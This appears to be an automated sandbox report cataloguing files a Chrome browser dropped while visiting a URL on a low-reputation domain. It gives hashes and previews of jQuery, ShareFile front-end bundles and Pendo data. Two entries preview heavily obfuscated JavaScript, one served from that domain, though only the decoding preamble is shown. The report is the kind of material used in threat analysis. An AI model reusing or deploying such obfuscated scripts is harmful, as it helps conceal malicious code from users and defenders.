                                                                                                                                                                                                                                                                                SHA-512:0FCBDFCC864CAE33DAE59AC24D6BC56452D1E68C4347B76456379686A70077EA4EB88CE28A0E04D3E5C0AACDDAB3C4488A29B27C65D4BA54A3013EEA0F56D49F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/aty/L1BEWKG1JFCBQ5TPZV5GTTZQD
                                                                                                                                                                                                                                                                                Preview:function _0x49b429(_0x13321f,_0x2c20c7,_0x5c0056,_0x3818ef,_0x2df98e){return _0xa6a8(_0x3818ef- -0x30e,_0x2df98e);}(function(_0x3e4334,_0x1580f7){var _0x2a0896=_0x3e4334();function _0x3007b2(_0x44daf3,_0xca3662,_0x130911,_0x53577b,_0x1fe554){return _0xa6a8(_0xca3662-0x29,_0x130911);}function _0x465ad5(_0x1ae45f,_0xeeec23,_0x29f1db,_0xb9a73f,_0x1eb118){return _0xa6a8(_0x1ae45f-0x153,_0x29f1db);}function _0x3b19cd(_0x55502c,_0x4d137c,_0x66957f,_0x345c2a,_0x5af1c9){return _0xa6a8(_0x55502c-0x1e1,_0x5af1c9);}function _0x54200c(_0x3d0a5b,_0x508025,_0x5bb75a,_0x272da6,_0x5c29d0){return _0xa6a8(_0x3d0a5b- -0x2fd,_0x508025);}function _0x30f7ef(_0x2dd25b,_0x11eff8,_0x4474d9,_0x42d7cc,_0x3fa1e2){return _0xa6a8(_0x4474d9-0x3c5,_0x2dd25b);}while(!![]){try{var _0xe3473=-parseInt(_0x30f7ef(0x8bb,0x1f5,0x719,0x78f,0x72c))/(-0x15ee+0x1ebd+-0x8ce)*(parseInt(_0x465ad5(0x7ab,0x6dc,0xb9c,0x9a9,0x3eb))/(0x1833*0x1+-0x1350+-0x1*0x4e1))+-parseInt(_0x54200c(0xdc,0x3ca,0x42,0x5c5,0xbe))/(-0x138f*0x1+-0x12a2+-0
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):87462
                                                                                                                                                                                                                                                                                Entropy (8bit):5.262148110388299
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:/KRUXRa8Dgwxcy2jpBNwch96SLk8Ek2BSrBGS1ia/eEk4aV2EXi8SMpQ47GKV:/u1zNwcv9qBy1HOg8SMpQ47GKV
                                                                                                                                                                                                                                                                                MD5:E6C2415C0ACE414E5153670314CE99A9
                                                                                                                                                                                                                                                                                SHA1:5A9EEAC34D86E92E5660E0F4F87204F1ED0C8FF6
                                                                                                                                                                                                                                                                                SHA-256:D8F9AFBF492E4C139E9D2BCB9BA6EF7C14921EB509FB703BC7A3F911B774EFF8
                                                                                                                                                                                                                                                                                SHA-512:DE027062931EDD07B01842EFF24FC15FDBDCAA1AF245DCD133155FABA9E0C965F0A34DC6144CE3B149BC43B4597073C792CB6DABBFC6168C63095523923BCF77
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65464)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1420749
                                                                                                                                                                                                                                                                                Entropy (8bit):5.886217400031823
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:sc+Znn2E8wfayki0zgT0619jsY+Gsx7KDbau5MH:PhwfaFgT0619jsY+GsxsauqH
                                                                                                                                                                                                                                                                                MD5:1D059A1E91899CAD205E8515BEA97D44
                                                                                                                                                                                                                                                                                SHA1:267D30365734958CE77067EB024CAA2B420AF43B
                                                                                                                                                                                                                                                                                SHA-256:018DA9C0A119691D99F8CF324C5A07665A6E2117A5DD691B06F4C69E171BD243
                                                                                                                                                                                                                                                                                SHA-512:23CBDD2032341B9AF71B360174C9496D2FB4B02CEF82044733F94600BCEC62A46CB19650ABC80ADB561D19FA35FCE7B1C82CFD7FF1EA1C1745CCB1DEEBEDBE83
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{}).System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},i={},a={},s={},l={},c={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.Alert=e.Alert,r.App=e.App,r.Avatar=e.Avatar,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Spin=e.Spin,r.Steps=e.Steps,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.__assign=e.__assign,i.__awaiter=e.__awaiter,i.__rest=e.__rest},function(e){a.Cu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (44068)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):168303
                                                                                                                                                                                                                                                                                Entropy (8bit):5.378177131519903
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:vQbl8QczNfaa2fOlRDJgBl3Bb8o8tPFrT9a63S5ho7uzl5JN9A4jj4S/xL0O6eVr:vpxzQzl5NH4S/6WdX
                                                                                                                                                                                                                                                                                MD5:9D05D779D2D542EC1C7FA0C58CDFB50F
                                                                                                                                                                                                                                                                                SHA1:2C16AD042D5026E466F4FAAFC6D6A05FDD408FAB
                                                                                                                                                                                                                                                                                SHA-256:D37F2191CF32DC4473CCA62F493B3C66637B8A78A6354ADE4EA026D2D998C435
                                                                                                                                                                                                                                                                                SHA-512:A4F648F25A2BAADB50A24DBCA669130CB4ABEE05164112C8B1D6C3580FC16E0E7E15E5BE6B4B17A9F97626F4CF4C3F1D885377AE74AC9139ACB4714594F4F33D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dc-pilet/1.379.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},o={},s={},l={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Badge=e.Badge,a.Button=e.Button,a.Card=e.Card,a.Col=e.Col,a.DatePicker=e.DatePicker,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Image=e.Image,a.Input=e.Input,a.InputNumber=e.InputNumber,a.Modal=e.Modal,a.Popover=e.Popover,a.Row=e.Row,a.Select=e.Select,a.Sk
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):199512
                                                                                                                                                                                                                                                                                Entropy (8bit):5.361186797681031
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Hcw12O6Q3jpptl874SyaDlInKIIbQxkLh1Qkr/:8wkOLjpptlm4Sy3KVb/N
                                                                                                                                                                                                                                                                                MD5:38596D901C05CDCB1B7DB1F4D6D21BA7
                                                                                                                                                                                                                                                                                SHA1:8A86524AAEE7B7462081A6A3C6F9FBCF6174C80A
                                                                                                                                                                                                                                                                                SHA-256:159C798B7CB0A3F271E179FBFF2D2862394D1F2832F248D6F71802C7F253C04E
                                                                                                                                                                                                                                                                                SHA-512:3FFB8DF04864002AE61D41DCF30B55BDBB3285E0843425EDDD0BFB2258CEA89FE540123F98F5B896673C3E41A5D096123E87BB6E519FD3B8639C10438ABD9D7D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Image=e.Image,r.Layout=e.Layout,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=>{var e,s,u,c,l={439:(e,t,n)=>{"use strict";n.d(t,{z1:()=>k,cM:()=>y});var r=n(2456),o=n(6250),i=2,a=.16,s=.05,u=.05,c=.15,l=5,f=4,d=[{index:7,opacity:.15},{index:6,opacity:.25},{index:5,opacity:.3},{index:5,opacity:.45},{in
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):127669
                                                                                                                                                                                                                                                                                Entropy (8bit):5.3054031840803795
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Ze10ed17nqzxppbm/Lgh1aaZV0YYLAbaf1:4Cs17nqzxppbsAbad
                                                                                                                                                                                                                                                                                MD5:4077449FAF475C84E9BF4B7792210A6E
                                                                                                                                                                                                                                                                                SHA1:0A9A67D58288E93D1CBBD840FE18D1F175D669E2
                                                                                                                                                                                                                                                                                SHA-256:EC56A76FDDD40A32BD41623C218F237FB7F618C88E0BA5DA76FD74B287C35277
                                                                                                                                                                                                                                                                                SHA-512:AB3CF7ED361372D0AFF3005953C22A7BD758BF829951ACBBCC2480107E3BA3DBD70FC2E7CF28C0687207B9C7AC38673844B6DF4421BB7AF96EEE818166DB123B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.UserRole=e.UserRole},function(e){r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Carousel=e.Carousel,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Menu=e.Menu,i.Modal=e.Modal,i.Popconfirm=e.Popconfirm,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){s.createPortal=e.createPort
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):199333
                                                                                                                                                                                                                                                                                Entropy (8bit):5.013103448858446
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:mSK3Do7geTGmqEAmwROHngtMkCE9UZyBJC:w3MMeTGnEH/gjCE/C
                                                                                                                                                                                                                                                                                MD5:25930B37116B2474777D799979918568
                                                                                                                                                                                                                                                                                SHA1:4D0AE3F123CA421EC90EF3348C3B39AC655E9236
                                                                                                                                                                                                                                                                                SHA-256:B294D339F709A0620968800517ED512F5EA76A8D06959FF59F6F2EC6F3FDCDB7
                                                                                                                                                                                                                                                                                SHA-512:D3DF8EE8C3CEFAB0F214E250A11552A9C94D9374AABB7E745A9271D69C82C04ED7FD525FB0244E1BD9FC24BFCEA7A6F4384BBB86051E84A817BB2413F1017A6E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,_0x588cd5);}function _0x397734(_0x341432,_0x204bb2,_0x5f2ec7,_0x4a4c86,_0x361db0){return _0x4e53(_0x204bb2-0x9c,_0x5f2ec7);}function _0x5ee178(_0x31a9bc,_0x5b0a99,_0x45ebe4,_0x2fd736,_0x471b52){return _0x4e53(_0x471b52- -0x106,_0x45ebe4);}function _0x1aee45(_0x3e1555,_0x40a413,_0x1c1268,_0x3e7959,_0x13fc10){return _0x4e53(_0x13fc10- -0x61,_0x40a413);}var _0x250efa=_0x5b1989();while(!![]){try{var _0x5d818c=-parseInt(_0x1ee071(0xa3,-0x21e,-0x25e,-0xd2,-0x100))/(-0x5*-0x543+-0x28*-0x60+0x11*-0x26e)*(-parseInt(_0x98c760(0x78,0x123,-0x10f,0x1ed,0x97))/(-0x1*0x1193+-0x1eb7+0x1826*0x2))+-parseInt(_0x5ee178(0x6f,0x263,0x1a7,0x8b,0x161))/(-0x1b0d+-0x1fdf+-0x3aef*-0x1)*(parseInt(_0x1aee45(0x17,0x27c,0x1f6,0x2e2,0x177))/(-0x1*0x2047+0x2592+0x1*-0x547))
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):130723
                                                                                                                                                                                                                                                                                Entropy (8bit):5.341189118692514
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:GHF3NWoK5wEzGmqmEwkOw1GC34fOtB+7sAhgod64QUDs5aBzvT0ijJTak0JK8a/K:Gyosw7Oyx34fOGjxakP8Qkl
                                                                                                                                                                                                                                                                                MD5:0496A964F7644C653415D31FD499388B
                                                                                                                                                                                                                                                                                SHA1:2D3AC1D48F2BD9771D17F70FAD25D6BE54C9A7F2
                                                                                                                                                                                                                                                                                SHA-256:6676EBA7254F48E07B446B828180B7B1EA7BDA2A3018CC01AC48FC88A514FA12
                                                                                                                                                                                                                                                                                SHA-512:723ABD2D320B2E0D3BF38CBC55B55E62A619841BF31D0979DC17DE95A67D70E9AFA6A37928C76ED0D4E99B106AEF7B5EB5115D64C5E29F063B22C5C7756D38E6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemO
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (13545), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):13546
                                                                                                                                                                                                                                                                                Entropy (8bit):4.792073494007343
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:/LCNyKY+DjKNf7FXNY8/gSgTI5lSgTIZHyxIEYcmacMSgTIkJSgTId6RaSgTI9VZ:22/tuKLcA5
                                                                                                                                                                                                                                                                                MD5:1711B6CAC451CFDB8E7EF06DAEDB3279
                                                                                                                                                                                                                                                                                SHA1:C413F2ACDD0CDABE881719E8EF54F4B21969F907
                                                                                                                                                                                                                                                                                SHA-256:386F4FDE9CA6B967C1F9968AAA58E104F05A1F66A592D2E46019954E32CAAD24
                                                                                                                                                                                                                                                                                SHA-512:A7F5876FEC9EB2B77A196C04CA8ECE53E9A9A9E5C096E69E7DB70C77E758A6C4C89797B56EAE0B49E391509E7F7CFB89DB543905D534E68EBEEF5983E507B290
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"props":{"id":"pendo-base","data-layout":"lightboxBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-3d4e8aaf:hover","styles":{"color":"#D9D7D7"}},{"selector":"#pendo-close-guide-3d4e8aaf:focus","styles":{}},{"selector":"#pendo-button-1e3402c8:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400}},{"selector":"div:focus","styles":{}},{"selector":"button:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-qrJmWADnkufXgGqv6M-p2xBSYIU","data-vertical-alignment":"Relative to Element","data-relative-alignment":true,"style":{"z-index":300000,"position":"relative","width":"350px","animation":"none","float":"none","vertical-align":"baseline","display":"block"},"class":"_pendo-step-container-size"},"type":"div","children":[{"props":{"aria-modal":"false","tabindex":"-1","role":"dialog","id":"pendo-guide-container","data-car
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-data.customer.pendo.io/data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.249.1_prod&ct=1728497131241&jzb=eJzVkt9vmzAQx_8XPyeADQact2ntpkj7wZROWlVVyMCRWANMjUnEqvzvPacRal-iTdo0lSfs89197r7fu0dipx7IiqgKOqvqiSxIYfRhAJNb1WKEJiyNREJDyli8IHs1KKtNripMyrPrL1df85v848_b9YfswA_yGgvIstRjZ5_fyDTgQSrokhYJXaYpjZdCyHRZJTXnVVQWgjPMGU2Dj3fW9sPK93sDrQJTFN6wkwZq1YBX6tY_nfy9goNPUxHGlCFZHEUxLbFGb3Q_kNUj0U2V_w6oe_cSthub5l-NeEQ-hO_sjSzWcy_7fCD8FtdrN4yG7zMZCYUtaiNbOAX3ZZFNn6ZJbzcZl3u3rgEeRuhK1CdAwSYLOHfE2XExC9qClRfFFG9EzDOk-73E2chuO8qtGx26_PvGLfzM7lJl31_pVqoO468wMPVPRqtB2tG4dd8RHcYcr1AHM_UWKsD6DbmflX43t8erSlrHFgifBj4LWISZezCD0g6JeSwSHs1x6uqvW2VwTU7hH2sRF5DVv7bfNrvPWfrKSXR2Ek_CF05qtKwuOSlEC74JJ7lBzviMh2Hk0WD-4v-0dDYvPYyD4_0TChW3Tg
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):39129
                                                                                                                                                                                                                                                                                Entropy (8bit):5.542441470826308
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:LlnhwRci5kfoUOeQTxzx2iZpqTbLGKfTb/wbL3lob2DgTb/CPu49dPTbczQDsEDA:VuRci52oUg9uTvfTj4lgTjsNpTGM1Bvi
                                                                                                                                                                                                                                                                                MD5:ED0E69AAD717E49A0A8BD146E80C6B0D
                                                                                                                                                                                                                                                                                SHA1:7C066B28FB0B9B299E2F70A886B6095664CB4E7A
                                                                                                                                                                                                                                                                                SHA-256:7AEA044DD5B51F285EAF6A98A29CCB8AC6C6D417790DCDDAA1E2CA19FBC49647
                                                                                                                                                                                                                                                                                SHA-512:96AD345AF4D0CD49C5F8FB1FA6F337DF158CE0E4B77125A0AC0A0E37F2DB083250E0509DD7EA0B9CB56573A6954A8604B4657C2AC2F9CC689E03BD401138ECB3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"guides":[{"createdByUser":{"id":"","username":"","first":"","last":"","role":0,"userType":"","hasLoggedIn":false},"createdAt":1694012335560,"lastUpdatedByUser":{"id":"","username":"","first":"","last":"","role":0,"userType":"","hasLoggedIn":false},"lastUpdatedAt":1697135142143,"appId":-323232,"id":"DGXiXepNeRvpgcvqVVwgerMyl9c","name":"Video - How to add an upload link to your email signature","state":"public","emailState":"","launchMethod":"launcher","isMultiStep":false,"isTraining":false,"attributes":{"dates":{"de":"Sep. 6, 2023","en-US":"Sep 6, 2023","es-ES":"sep. 6, 2023","fr":"sept. 6, 2023","ja":"9. 6, 2023","ko":"9. 6, 2023","nl":"sep. 6, 2023","pt-BR":"Set 6, 2023","ru":"..... 6, 2023","zh-CN":"9. 6, 2023"},"device":{"type":"all"},"isAnnouncement":true,"priority":689,"sharedServiceVersion":"4.8.18","type":"building-block"},"audienceUiHint":{"filters":[]},"authoredLanguage":"en-US","recurrence":0,"recurrenceEligibilityWindow":0,"resetAt":0,"publishedAt":1694021649968,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):188870
                                                                                                                                                                                                                                                                                Entropy (8bit):5.316783423719702
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:xZ2Qw6hfT5ppCWE9xpCAsdyiDlpf9s80zYKsvy5/YGZ:xXw6hfT5ppFEHpChdyqf+80zYKsq5/F
                                                                                                                                                                                                                                                                                MD5:3EB98FC30E286B34AE6A699333C2B13C
                                                                                                                                                                                                                                                                                SHA1:77C23C14692750726264F041C4A4A5AE8500F342
                                                                                                                                                                                                                                                                                SHA-256:A32F71A5A80553B0D31399E96A2288F045B600E289446F601D032909AB5B6614
                                                                                                                                                                                                                                                                                SHA-512:A1D7564C6D92A10087C813DC68FAA3C4B031B5BD97FB435B4C7470B8FF73218A6D74B24F5AA6786F0A98FF1C8BF2457728358BADE24037FCFF4732B2ED2E21AC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{}).System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,s={2910:(e,t,r)=>{"use strict";r.d(t,{FK:()=>ke,Y:()=>Te,FD:()=>je});var n=r(4848),o=r(4726);var i=function(){function e(e){var t=this;this._insertTag=function(e){var r;r=0===t.tags.length?t.insertionPoint?t.insertionPoint.nextSibling:t.prepend?t.container.firstChild:t.before:t.tags[t.tags.length-1].nextSibling,t.container.insertBefore(e,r),t.tags.push(e)},this.isSpeedy=e.speedy===undefined||e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):650980
                                                                                                                                                                                                                                                                                Entropy (8bit):5.518287641652362
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:xOq/TqppnEuBOn0ffoPNOAihD3YV3IV3lV3q0D4wVqGV3DV3kVqzVqd7lS048yF1:zyO0ffoPNqhD34m4H53cWfxcT
                                                                                                                                                                                                                                                                                MD5:D46761310B3C627CC468F3B845E55ECA
                                                                                                                                                                                                                                                                                SHA1:41E1ED698BAF4A8B5228B551175ABA04B1F3D573
                                                                                                                                                                                                                                                                                SHA-256:ADE7ADA624732E91D0A25FBE9715B4628827176AD5ED40EDA779916A9C15CEC8
                                                                                                                                                                                                                                                                                SHA-512:0EECBC74A272D297DEC3BCC12E3F52D2741B6DA0C97478438B640BA9A9BABF6DD47ADEA182D8F2C8561C6DD61FC7C00CB9DF2B583093EF30C761F8D65BA59E59
                                                                                                                                                                                                                                                                                Malicious:false
